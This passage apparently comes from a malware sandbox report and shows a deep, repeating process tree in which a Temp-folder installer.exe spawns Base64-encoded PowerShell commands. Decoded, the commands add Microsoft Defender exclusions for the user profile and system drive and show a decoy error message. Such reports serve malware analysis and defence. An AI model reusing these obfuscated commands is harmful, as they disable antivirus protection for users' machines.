        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        33⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        33⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        34⤵
        System Location Discovery: System Language Discovery
        
        PID:3916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        34⤵
        System Location Discovery: System Language Discovery
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        34⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:7988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        35⤵
        
        PID:8304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        35⤵
        
        PID:8404
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        35⤵
        Checks computer location settings
        
        PID:8444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        36⤵
        
        PID:8684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        36⤵
        System Location Discovery: System Language Discovery
        
        PID:8720
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        36⤵
        Checks computer location settings
        
        PID:8812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        37⤵
        
        PID:9072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        37⤵
        
        PID:9132
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        37⤵
        Checks computer location settings
        
        PID:9204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        38⤵
        System Location Discovery: System Language Discovery
        
        PID:8356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        38⤵
        
        PID:8368
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        38⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:8252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        39⤵
        
        PID:5628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        39⤵
        System Location Discovery: System Language Discovery
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        39⤵
        Checks computer location settings
        
        PID:8444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        40⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        40⤵
        
        PID:7512
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        40⤵
        Checks computer location settings
        
        PID:9196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        41⤵
        System Location Discovery: System Language Discovery
        
        PID:7760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        41⤵
        
        PID:876
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        41⤵
        Checks computer location settings
        
        PID:5216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        42⤵
        
        PID:5532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        42⤵
        System Location Discovery: System Language Discovery
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        42⤵
        Checks computer location settings
        
        PID:8808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        43⤵
        
        PID:6180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        43⤵
        
        PID:6220
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        43⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:5696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        44⤵
        System Location Discovery: System Language Discovery
        
        PID:5488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        44⤵
        System Location Discovery: System Language Discovery
        
        PID:5072
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        44⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:6008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        45⤵
        System Location Discovery: System Language Discovery
        
        PID:6840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        45⤵
        
        PID:6980
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        45⤵
        Checks computer location settings
        
        PID:5428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        46⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        46⤵
        
        PID:6824
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        47⤵
        
        PID:5696
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        46⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        47⤵
        System Location Discovery: System Language Discovery
        
        PID:6184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        47⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        47⤵
        Checks computer location settings
        
        PID:2368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        48⤵
        
        PID:1240
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        49⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
